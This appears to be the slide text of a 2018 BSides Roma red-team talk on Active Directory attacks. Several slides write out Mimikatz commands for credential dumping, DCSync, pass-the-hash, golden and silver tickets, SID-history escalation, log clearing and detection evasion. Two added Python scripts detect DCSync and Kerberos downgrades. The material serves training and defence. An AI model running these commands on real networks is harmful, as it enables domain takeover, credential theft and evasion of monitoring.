
BSides Roma 2018 - Red team techniques


My talk at BSides Roma 2018

  1. Red Team Techniques, or how to expand your Empire in an Active Directory environment. Guglielmo Scaiola MCT – MCSE – CEI – CEH – CHFI – ECSA – GPEN – ISO 27001 L.A. – Security+ mail: gs@miproparma.com Twitter: @S0ftwarGS Blog: S0ftwarGS.com
  2. Who am I? • Security Consultant and Ethical Hacker • Red Teamer and Penetration Tester • Microsoft System Engineer – A.D. expert • Incident Handling & Enterprise Forensics • Trainer & Speaker Guglielmo «S0ftwar» Scaiola MCT – MCSE – CEI – CEH – CHFI – ECSA – GPEN – ISO 27001 L.A. – Security+ mail: gs@miproparma.com Twitter: @S0ftwarGS Blog: S0ftwarGS.com
  3. AGENDA • Intro • Red Team Vs. Blue Team • Red Teaming Infrastructure • Play the Game • Defense • Q & A
  4. Red Teaming: my view • What is it for me? – Adversary Emulation – Custom Exploit Dev
  5. Red Team Vs. Blue Team: Red Team & Blue Team collaboration
  6. Red Teaming Infrastructure https://posts.specterops.io/designing-effective-covert-red-team-attack-infrastructure-767d4289af43
  7. Are you telling me there is one tool that automates all of this?
  8. My name is: ...CobaltStrike
  9. Red Team Attack Chain • Gain Access – Spear Phishing [Malware (trojan...) / Client Side Exploit] • Gain Situational Awareness – PowerShell / admin tools & commands • Escalation – Local User/Domain User → Local Admin with UAC/Domain User – Local Admin with UAC/Domain User → Local Admin Bypass UAC/Domain User – Local Admin Bypass UAC/Domain User → Domain Admin • Explore Network & Lateral Movement (loop back to Situational Awareness) • Persistence – Backdoor • Access & Egress Data • Extraction
  10. OSINT (pre-attack)
  11. Malware Vs. Client Side Exploit. Malware – Pro: • OS agnostic • Arch agnostic; Cons: • A file on disk. Client Side Exploit – Pro: • Fileless (sure???) • In-memory; Cons: • Specific to OS/app version
  12. Bypass AV – Bypass Proxy
  13. URL filtering Vs. Domain Fronting https://www.bamsoftware.com/papers/fronting/ https://github.com/rvrsh3ll/FindFrontableDomains https://www.youtube.com/watch?v=IKO1ovl7Ky4&t=6s
  14. Gain Situational Awareness
  15. BloodHound
  16. Priv Escalation: MS16-032 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
  17. Bypass UAC https://github.com/hfiref0x/UACME
  18. DEMO TIME
  19. Abuse Terminal Server Session
  20. MS14-068 – kekeo https://github.com/gentilkiwi/kekeo/releases
  21. Dump plaintext password
  22. Dump plaintext password???
  23. Back to the future https://www.trustedsec.com/2015/04/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/ (re-enable WDigest credential caching, so plaintext passwords are back in LSASS memory after the next logon): reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
  24. Dump local hash DB: lsadump::lsa /inject /name:krbtgt – lsadump::lsa – lsadump::lsa /patch
  25. DSRM Password https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior (2 = the DSRM administrator may log on to the DC while AD is running)
  26. DCSync: 1) Discover a DC 2) Ask it to replicate the user's credentials via GetNCChanges. lsadump::dcsync /domain:child1.newtest.lab /user:child1\krbtgt
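A detection for the DCSync step above, as an added example that is not part of the talk: with directory-service access auditing enabled, the DC logs Event ID 4662 for each replication request, including the control-access GUIDs that were exercised, and any principal other than a domain controller (or an allow-listed sync account) exercising them is running a DCSync. The one-line event rendering, the account names (CHILD1\admin2, CHILD1\DC012K12R2$, the MSOL_ account) and the allow-list are constructed for this example; the three replication GUIDs are the real AD extended-right GUIDs.

```python
"""Flag DCSync (DRSUAPI GetNCChanges) requests in constructed Security 4662 events.

Added example for the talk's DCSync slide, not code from the author. Real 4662
events are XML; here each event is a one-line 'key=value; ...' rendering so the
script runs offline on the constructed sample below.
"""
import re

# Extended rights that a GetNCChanges caller exercises (stable AD schema GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals that may legitimately replicate (hypothetical names): the DC's own
# computer account and an Azure AD Connect style sync account. Anything else alerts.
ALLOWED_REPLICATORS = {"CHILD1\\DC012K12R2$", "CHILD1\\MSOL_1A2B3C4D"}

GUID_RE = re.compile(r"\{([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})\}", re.I)


def parse_event(line):
    """Split one constructed 'key=value; key=value' line into a dict."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def detect_dcsync(lines):
    """Return (subject, [right names]) for each 4662 in which a principal that is
    not on the allow-list exercised a replication right."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        exercised = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in exercised & set(REPLICATION_RIGHTS))
        if not rights:
            continue  # some other control-access right, not replication
        subject = ev.get("SubjectAccount", "")
        if subject.upper() in ALLOWED_REPLICATORS:
            continue  # expected replication partner
        hits.append((subject, rights))
    return hits


# Constructed sample: a DC replicating (normal), admin2 running lsadump::dcsync
# (DCSync), a helpdesk user touching a user object (unrelated 4662), and a logon.
SAMPLE_EVENTS = [
    "EventID=4662; SubjectAccount=CHILD1\\DC012K12R2$; ObjectType=domainDNS; AccessMask=0x100; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectAccount=CHILD1\\admin2; ObjectType=domainDNS; AccessMask=0x100; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectAccount=CHILD1\\helpdesk1; ObjectType=user; AccessMask=0x10; "
    "Properties={aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}",  # placeholder property GUID
    "EventID=4624; SubjectAccount=CHILD1\\admin2; LogonType=3",
]

if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspected: {subject} exercised {', '.join(rights)}")
```

The allow-list is the part that needs care in a real domain: build it from the computer accounts of actual DCs (and known sync accounts), not by pattern-matching a trailing `$`, or an attacker-joined machine account slips through.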
  27. Mimikatz – over-pass-the-hash: sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:a87f3a337d73085c45f9416be5787d86
  28. Silver ticket. A silver ticket is a forged TGS (service ticket): using it involves no communication with the DC, but the ticket is encrypted (and its PAC signed) with the target computer account's key, and that account's password changes every 30 days by default. On the target: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1. kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /service:cifs /ptt. On the DC: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\RefusePasswordChange = 1 and HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge
  29. Mimikatz – Golden Ticket: kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /ptt
  30. 519: Active Directory persistence with SID History (RID 519 is Enterprise Admins in the forest root; /sids places that SID in the ticket's extra SIDs, so a child-domain golden ticket becomes forest-wide): kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /groups:513,512,520,518 /sids:S-1-5-21-655507452-925574031-147420587-519 /ptt
  31. Skeleton key
  32. Malicious Security Provider HKLM\System\CurrentControlSet\Control\Lsa\Security Packages
  33. AdminSDHolder
  34. AdminSDHolder
  35. Process Doppelgänging – a new way to impersonate a process
  36. Clearing tracks with Mimikatz 2.1.1 20171220 • event::drop • event::clear
  37. PowerShell without powershell.exe – bypass Device Guard
  38. Bypass W10 security enhancements • AMSI • Autologging • Windows Defender SmartScreen • Device Guard • Windows Defender Antivirus • Credential Guard
  39. LAPS – Local Administrator Password Solution https://technet.microsoft.com/en-us/mt227395.aspx
  40. LAPS – Get-AdmPwdPassword
  41. The winner is… ATA
  42. Some ATA bypass techniques. ATA cannot detect the attack if: • the traffic is correctly formed at the protocol level (nothing anomalous on the wire) • ATA cannot see how the ticket (or request) was built • the traffic never passes a point monitored by its gateways or agents
  43. Bypass 1 – Over-pass-the-hash: sekurlsa::pth /user:MyUser /domain:MyDomain /aes256:aes256 /ntlm:ntlm /aes128:aes128. Example: sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:92937945b518814341de3f726500d4ff /aes256:cc057a204bb4aad41694a58f495b0834118599d76c7a66b0326cb250a9c46f8f /aes128:d4a5dd3dce09a0e031c114fdd7e8094c. With only the NTLM hash the client can ask the KDC for RC4 tickets alone, which ATA flags as an encryption downgrade; supplying the account's AES keys as well makes the exchange look like a normal Windows logon.
  44. Bypass 2 – Golden Ticket: kerberos::golden /User:MyUser /domain:MyDomain /sid:S-1-5-21-3270384115-3177237293-604223748 /aes256:aes256krbtgt /id:1000 /groups:512,513,518,520 /ptt. A golden ticket built with AES keys can be generated from any machine, unlike the restrictions in the over-pass-the-hash case.
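What the two ATA bypasses above are avoiding, as an added example that is not the author's code: a TGT requested with only an NTLM hash is negotiated as RC4-HMAC (etype 0x17), and the DC records that in Event 4768 as "Ticket Encryption Type 0x17" for an account that normally gets AES (0x12); the same mismatch shows up in 4769 when a service ticket is issued with a weaker etype than the service account supports. That mismatch is what ATA's encryption-downgrade detection, and the script below, key on, and it disappears once the AES keys are supplied. The event rendering, account names, client addresses and the per-account baseline are constructed; the etype numbers and the msDS-SupportedEncryptionTypes bit values are the real ones.

```python
"""Kerberos encryption-downgrade check over constructed 4768/4769 events.

Added example for the over-pass-the-hash / golden-ticket ATA bypass slides, not
code from the talk. A TGT request made with only an NTLM hash is negotiated as
RC4-HMAC (etype 0x17); one made with the account's AES keys is AES256 (0x12)
and is indistinguishable from a normal Windows logon.
"""

# Kerberos encryption type numbers as they appear in "Ticket Encryption Type".
ETYPE_NAMES = {
    0x01: "DES-CBC-CRC",
    0x03: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96",
    0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC",
}
AES_ETYPES = {0x11, 0x12}

# msDS-SupportedEncryptionTypes bit -> the etype it enables.
SUPPORTED_ETYPES_BITS = {0x01: 0x01, 0x02: 0x03, 0x04: 0x17, 0x08: 0x11, 0x10: 0x12}


def etypes_from_attribute(value):
    """Decode an msDS-SupportedEncryptionTypes value into the set of etypes."""
    return {et for bit, et in SUPPORTED_ETYPES_BITS.items() if value & bit}


def parse_event(line):
    """Split one constructed 'key=value; key=value' line into a dict."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def detect_downgrade(lines, baseline):
    """Return (EventID, principal, etype name) for every ticket issued with a
    non-AES etype to a principal whose baseline says it has AES keys.

    For 4768 the relevant principal is the requesting account (the TGT etype
    follows what the client asked for); for 4769 it is the service account,
    because the service ticket is encrypted with that account's key.
    """
    alerts = []
    for line in lines:
        ev = parse_event(line)
        event_id = ev.get("EventID")
        if event_id == "4768":
            principal = ev["Account"]
        elif event_id == "4769":
            principal = ev["ServiceName"]
        else:
            continue
        etype = int(ev["TicketEncryptionType"], 16)
        supported = baseline.get(principal.lower(), set())
        if etype not in AES_ETYPES and supported & AES_ETYPES:
            alerts.append((event_id, principal, ETYPE_NAMES.get(etype, hex(etype))))
    return alerts


# Constructed baseline: etypes each principal is known to use, decoded from
# msDS-SupportedEncryptionTypes (0x1C = RC4+AES128+AES256) or learned from past 4768s.
BASELINE = {
    "admin2": {0x12},
    "svc_legacy": {0x17},                      # RC4-only account: RC4 is normal for it
    "dc012k12r2$": etypes_from_attribute(0x1C),
}

# Constructed events: a normal logon, pth with /ntlm only, a legacy RC4 account,
# then two service-ticket requests to the DC's account (RC4, then AES).
SAMPLE_EVENTS = [
    "EventID=4768; Account=admin2; ServiceName=krbtgt; TicketEncryptionType=0x12; ClientAddress=10.0.0.15",
    "EventID=4768; Account=admin2; ServiceName=krbtgt; TicketEncryptionType=0x17; ClientAddress=10.0.0.15",
    "EventID=4768; Account=svc_legacy; ServiceName=krbtgt; TicketEncryptionType=0x17; ClientAddress=10.0.0.40",
    "EventID=4769; Account=admin2@CHILD1.NEWTEST.LAB; ServiceName=DC012K12R2$; TicketEncryptionType=0x17; ClientAddress=10.0.0.15",
    "EventID=4769; Account=admin2@CHILD1.NEWTEST.LAB; ServiceName=DC012K12R2$; TicketEncryptionType=0x12; ClientAddress=10.0.0.15",
]

if __name__ == "__main__":
    for event_id, principal, etype in detect_downgrade(SAMPLE_EVENTS, BASELINE):
        print(f"Event {event_id}: {etype} ticket for {principal}, which has AES keys")
```

Only the second 4768 and the first 4769 alert; the pth run with the AES keys produces the first 4768, which looks identical to the normal logon. That is the limit of protocol-level detection the slide describes, and why the baseline (which accounts should never see RC4) has to come from the directory, not from the traffic.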
  45. WPC2017
  46. DEMO TIME
  47. We must never end up in "certain conditions"! Under certain conditions every security countermeasure can be bypassed... So?
  48. Defense in depth
  49. SIEM, logging and Threat Intelligence
  50. Q & A
  51. Credits • SpecterOps: @SpecterOps – Matt Graeber: @mattifestation – Will Schroeder: @harmj0y – Raphael Mudge: @ArmitageHacker – Andrew Robbins: @_wald0 – Matt Nelson: @Enigma0x3 • Benjamin Delpy: @gentilkiwi • Sean Metcalf: @PyroTek3
